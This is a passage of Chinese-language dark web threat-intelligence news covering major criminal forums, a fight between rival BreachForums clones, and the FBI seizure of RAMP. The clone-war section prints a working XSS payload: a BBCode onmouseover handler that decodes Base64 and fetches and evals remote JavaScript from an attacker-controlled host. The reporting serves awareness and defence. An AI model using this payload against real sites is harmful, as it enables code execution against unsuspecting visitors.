为什么重要?很多大事件在主流媒体报道前,好几个月就在Dread上发酵了。勒索软件新变种、团伙内讧、甚至哪个管理员跑路了,这里往往是最先冒泡的地方。防御端来说,这里是抓“早期信号”最好的窗口——噪声多是多,但信号确实真。
二、BreachForums:数据泄露的“头条制造机” BreachForums这几年命真硬,克隆版本如雨后春笋般顽强,且爆发激烈战争。2026年初刚被爆出一次大规模用户数据库泄露,几十万账号暴露,社区一度乱套,但它还是顽强活了下来(或者说,不断有人接续重启了)。这地方就是数据泄露的“菜市场”——零售巨头、游戏公司、社交平台的dump,常常是这里最先挂出来。
热闹是真热闹,记者也爱盯着这里写报道。但别被表象骗了:一半帖子是假货、重复利用老数据,或者纯粹为了炒热度。真正有价值的情报,得会分辨上下文和卖家信誉。
对企业来说,这里是监控自家品牌泄露的首选站点的之一。很多公司在内部检测到异常前,好几天就在这里看到自家员工凭证被甩卖了。
三、XSS(以及它的“继承者们”):初始接入的“华尔街” XSS.is在2025年中被各国警方搞了一次大的国际联合执法行动,管理员被抓,域名也被查封。但俄罗斯语社区的生命力你懂的——2026年,类似的功能已经部分转移到RAMP、DamageLib这些继任者身上。老XSS的风格没变:重度商业化,卖的就是企业网络的“门票”——RDP、VPN、域管账号、云主机权限。
这里交易的不是小打小闹的个人账号,而是能直接横向移动的大企业访问权。很多后续的勒索攻击,第一步就是在这些地方买到的初始接入。
防御方得特别留意:等你内部告警响了,往往已经晚了三步。盯着这些初始接入经纪人(IAB)的动向,才能提前堵枪眼。
四、Exploit.in与CryptBB:技术硬核的“实验室” Exploit.in还在,定位没变:工具、漏洞、恶意软件的深度讨论区。这里不像前面几个那么喧闹,更像是技术宅的私人俱乐部。私有exploit、零日交易、新型恶意软件源码分享,都在这里悄悄进行。
2026年新冒头的CryptBB走得更极端——加密做得极严,准入门槛高,主要服务精英玩家。想看到下一代攻击技术在扩散前的模样?这俩地方是必看窗口。
普通公司可能觉得离自己远,但其实不然:很多“高级”技术过几个月就会流到低端市场,变成脚本小子都能用的货。
五、Nulled、Cracked、Altenen、LeakBase:大众化的“灰色集散地” 这几个论坛用户量大得吓人,门槛低,内容五花八门——从破解账号、盗刷教程,到现成的恶意软件工具包,应有尽有。Nulled和Cracked偏工具和破解,Altenen更重carding和欺诈,LeakBase则是纯数据泄露分享。
别看它们“低端”,影响力其实很大。新手从这里入门,老鸟也常来淘便宜货。很多主流恶意软件家族的变种,就是先从这些地方扩散开来的。
为什么防御端不能忽略?因为攻击大众化的趋势越来越明显——威胁不再只来自顶尖APT,很多普通企业的噩梦就是这些社区里随便一个脚本小子用现成工具捅进来的。
总结:最后说两句 2026年的暗网论坛生态,比以往任何时候都更分散、更韧性,“暗网下/AWX”认为,执法机构应该紧盯这些论坛,以随时掌握暗网新的动态。
旧的被端了,新的马上冒头;热闹的社区里噪音多,但真正的情报价值也高。做威胁情报的都知道:光靠技术挡是挡不住的,得懂对手在哪儿聊天、聊什么、谁在卖什么。盯紧这些地方,不是为了看热闹,而是为了在他们动手前,先知道他们想干嘛。
自从多次重启后的BreachForums论坛被FBI查封之后,暗网先后出现了两个名为BreachForums的论坛,一个是Indra的BreachForums[.]bf(管理员Indra与N/A),一个是Hasan的BreachForums[.]cz(管理员HasanBroker与breach3d)。这两个论坛的诞生注定会硝烟四起,BreachForums克隆论坛之间的一场战役正在打响。
“暗网下/AWX”此前跟踪报道,Indra的BreachForums[.]bf于2025年12月诞生,使用MyBB搭建,通过投放.fr域名数据库并伪造政府邮箱宣布论坛成立,宣称自己才是真正的官方BF论坛;Hasan的BreachForums[.]cz于2026年1月出现,使用XenForo搭建,称自己才是正统,目前已吸引逾1400名成员加入。
近期,这两个BreachForums论坛的战争进入了白日化阶段,先是BreachForums[.]bf域名被社会工程学攻击后被暂停,其次BreachForums[.]cz论坛也遭受了短时间的跨站脚本(XSS)漏洞攻击,整体而言,Hasan的BreachForums[.]cz略占上风。
BreachForums[.]bf域名丢失后又被找回 2月3日,BreachForums[.]bf域名突然被域名注册商暂停访问,其管理员N/A发布公告,紧急启动BreachForums[.]jp域名来替代访问。同时,Hasan在BreachForums[.]cz发布主题“Takedown of the Fake Clone”(拿下仿冒克隆),并表示正在使用SQL注入、跨站脚本、SSRF请求等诸多漏洞进行攻击。
2月8日,访问BreachForums[.]bf,显示异常的篡改消息以及倒计时,暗示该平台可能遭遇安全事件或系统入侵。界面显示了以下内容:公开倒计时、泄露的个人图像、提及涉嫌犯罪活动及执法部门的签名声明、与论坛常规运营通知无关的声明。
根据暗网研究专家IntelOps(@IntelOpsV3)发布的消息,有黑客窃取某西非国家政府邮箱后,通过社会工程手段诱使域名注册商暂停了BF域名。域名注册商将技术援助请求转交布基纳法索的ABDI机构作为主管当局寻求协助,但技术援助集体成功推动其采取行动。
据称,Hasan在该域名被删除后成功注册该域名,并在2月8日发布了篡改页面。但Indra最终说服注册商该举报属虚假信息,重新夺回BreachForums[.]bf域名控制权,并发布公告恢复该域名的使用。
BreachForums[.]cz网站被篡改后快速恢复 2月5日,BreachForums[.]cz网站曾遭遇了一次跨站脚本(XSS)漏洞攻击,短暂遭到篡改,疑似因为XenForo存在跨站脚本漏洞。Hasan发帖解释,该XSS漏洞可利用性源于XenForo解析BBcode的机制,属于原生漏洞即零日漏洞。
该Payload利用JavaScript的eval函数实现Base64编码的解码功能(部分依赖混淆性安全机制)。通过atob函数解码后,得到以下在鼠标悬停时触发的JavaScript有效载荷:
(async() => {
var u = "https://breachforums.pathetic.wtf/server.php?get=payload";
var r = await fetch(u);
var t = await r.text();
eval(t);
})() Payload如下:
'c': ['https://breachforums.pathetic.wtf/server.php', "[table width=\"100%' onmouseover='eval(atob("KGFzeW5jKCk9PnsgICAgIHZhciB1ID0gImh0dHBzOi8vYnJlYWNoZm9ydW1zLnBhdGhldGljLnd0Zi9zZXJ2ZXIucGhwP2dldD1wYXlsb2FkIjsgICAgIHZhciByID0gYXdhaXQgZmV0Y2godSk7ICAgICB2YXIgdCA9IGF3YWl0IHIudGV4dCgpOyAgICAgZXZhbCh0KTsgfSkoKQ=="))'\"] [tr][td]click here and you will be entered into the giveaway[/td][/tr] [/table]", 0x1, "credits giveawayy", 0x0, 0x1964, 'setTimeout', 0x2, "\n<head>\n <meta charset=\"utf-8\">\n <title>owned</title>\n <style>\n body { margin: 0; padding: 0; height: 100vh; background: #000; color: #ff00aa; font-family: 'Courier New', Courier, monospace; display: flex; align-items: center; justify-content: center; text-align: center; overflow: hidden; }\n .
在美国联邦调查局(FBI)的努力下,臭名昭著的俄罗斯暗网论坛RAMP的暗网和明网网站已被美国执法部门查封。RAMP,即“俄罗斯匿名市场”(Russian Anonymous Marketplace)的缩写,是一个以俄语为主的在线交易平台,自称是“唯一允许勒索软件存在的地方”,深受勒索软件即服务团伙、敲诈勒索者、初始访问经纪人和其他从事网络犯罪的不法分子青睐的
在其他一些论坛(例如XSS)被查封后,RAMP已成为少数几个仍能逍遥法外的网络犯罪论坛之一。XSS的领导人去年被欧洲刑警组织逮捕。这一真空使得RAMP成为传播勒索软件和其他网络威胁的人员买卖或交易产品和服务的主要场所之一。
美国联邦调查局 (FBI) 与佛罗里达州南区联邦检察官办公室和司法部计算机犯罪与知识产权部门协调,执行了此次查封行动。目前访问RAMP的暗网Tor域名(rampjcdlqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd[.]onion)及其明网域名(ramp4u[.]io),两个域名显示内容完全相同,为一个醒目的页面,页面显示执法部门的横幅广告,上面写着:“本网站已被查封”,意味着FBI已接管RAMP的域名。
扣押横幅上写着,FBI与美国佛罗里达州南区检察官办公室和美国司法部(DoJ)计算机犯罪和知识产权科(CCIPS)合作查封了该网站。该通知还嘲讽了RAMP运营商,上面写着“勒索软件唯一允许的地方!”,并配上了一张俄罗斯卡通人物玛莎(俄罗斯热门儿童动画片《玛莎和熊》中眨眼的玛莎)眨眼的图片。这份扣押横幅上没有像其他类似行动那样印有任何其他国际执法机构的标志,只列出了FBI和司法部的印章,似乎强调本次查封是美国当局独立完成的。
经“暗网下/AWX”测试,RAMP明网网站的域名服务器(DNS)记录已经重定向到FBI经常用于打击非法活动的域名服务器:
Name Server: ns1.fbi.seized.gov
Name Server: ns2.fbi.seized.gov 由于RAMP的暗网域名也被查封,本站(anwangxia.com)认为,FBI应已获取了RAMP论坛用户数据库和其他敏感的网站信息,如电子邮件地址、IP地址、私人消息和其他可能构成犯罪证据的信息,也就意味着经常访问与使用该网站的用户可能会被执法部门追踪到。
目前尚无任何关于RAMP运营者或用户被捕或拘留的消息。查封通知邀请公众通过FBI的IC3门户网站提交线索。
RAMP的查封行动与此前针对其他网络犯罪论坛的类似行动相呼应,表明执法部门正持续努力打击犯罪基础设施。虽然官方尚未确认任何逮捕行动,但此次行动凸显了勒索软件即服务(RaaS)运营及其相关生态系统面临的日益严峻的压力。
RAMP宣称是唯一允许勒索软件传播的暗网论坛 RAMP于2012年创建,最初是一个运行在Tor网络上的暗网网站,但直到2021年才开始声名鹊起,其运营者与现已解散的Babuk勒索软件团伙有关联。RAMP论坛目前的形态是在XSS和Exploit(俄罗斯网络犯罪领域两大主要暗网论坛)以及英语论坛BreachForums禁止讨论勒索软件之后形成的。
RAMP(俄罗斯匿名市场)宣称是暗网上唯一能允许勒索软件的论坛,该平台服务于俄语、中文和英语用户,拥有超过14000名注册用户,尤其受到勒索软件组织及其附属机构的青睐。所有用户在注册前都经过严格审核,或支付500美元匿名参与。该论坛提供讨论组、网络攻击教程以及恶意软件和服务市场。其首席管理员表示,该网站在2024年的年收入为25万美元。
RAMP最初旨在连接勒索软件运营者、关联方和中间商,如今已发展成为勒索软件生态系统的核心枢纽,成为威胁行为者协作、招募和交易的场所。目前RAMP不仅仅是一个交流平台,它更是一个勒索软件市场,DragonForce、Qilin、Medusa、GLOBAL Group、Eldorado和LockBit等勒索软件团伙都在此活跃。这些团伙积极招募技术娴熟的成员,宣传新的勒索软件变种,并共享行动情报,所有这些都是为了扩大自身的影响力和能力。
RAMP论坛的管理员中有一位名叫米哈伊尔·马特维耶夫(Mikhail Matveev)的俄罗斯公民,他也使用过Orange、Wazawaka和BorisElcin等化名,他于2022年表示,已经该论坛的所有权将转移给一位名叫“Stallman”的黑客。马特维耶夫于2024年在俄罗斯被捕。
2023年,马特维耶夫因参与多起勒索软件攻击活动(包括Babuk、LockBit和Hive)而被美国司法部起诉,这些攻击的目标是美国医疗保健机构、执法机构和其他关键基础设施。他还受到美国财政部外国资产控制办公室的制裁,并被列入联邦调查局的通缉名单,美国国务院悬赏高达1000万美元,征集能够逮捕或定罪他的信息。
网名为“Stallman”的黑客在RAMP论坛被关闭时仍然是该论坛的管理员,网络安全情报显示,Stallman“在维护信任、执行规则和管理平台的技术运营方面发挥了核心作用”。
在被查封后,情报公司Red Sense的联合创始人Yelisey Bohuslavskiy在LinkedIn上发帖解释说,RAMP是由与俄罗斯安全部门关系密切的人员创建的,目的是为了应对勒索软件即服务(RaaS)的蔓延。
他表示,直到2020年,俄罗斯、白俄罗斯和乌克兰的执法部门对Ryuk、Conti、REvil、Maze、Ragnar、Netwalker等传统且组织严密的网络犯罪集团都有很强的可见性。
“这种可见性部分来自于安全相关管理员对漏洞利用和跨站脚本攻击的控制。随后,RaaS(风险即服务)呈爆炸式增长。这种模式失控地蔓延:甚至论坛管理员也对关联方完全没有控制权。而RAMP正是为了解决这个问题而开发的,”他补充道。
据专家称,RAMP是新兴的、中低层级的勒索软件组织宣传自身、提供服务并“尽可能提高知名度”的主要中心。
Flare的高级威胁情报研究员Tammy Harper将RAMP描述为“网络犯罪生态系统中最值得信赖的勒索软件相关论坛之一”。
她解释说,该平台“被广泛认为是一个高度可信的托管环境”,并且是勒索软件运营商、中间人和关联方的主要讨论中心。
CybaVerse的安全运营中心 (SOC) 经理Ben Clarke解释说,RAMP成功的原因是“它为犯罪分子提供了一个支持整个攻击链的市场,从购买被盗凭证、推广恶意软件到出售和购买勒索软件服务。”
据了解,包括LockBit、ALPHV/BlackCat、Conti、DragonForce、Qilin、Nova、Radiant和RansomHub在内的许多臭名昭著的勒索软件组织都曾在不同时期在这个论坛上活动过。
Stallman承认FBI已经控制RAMP论坛,暂无重建计划 THE RAMP ADMINISTRATOR CONFIRMED THE ATTACK. A user with the nickname Stallman on the forum XSS confirmed that the forum administration had lost control. Here is the text of the statement: To whom it may concern.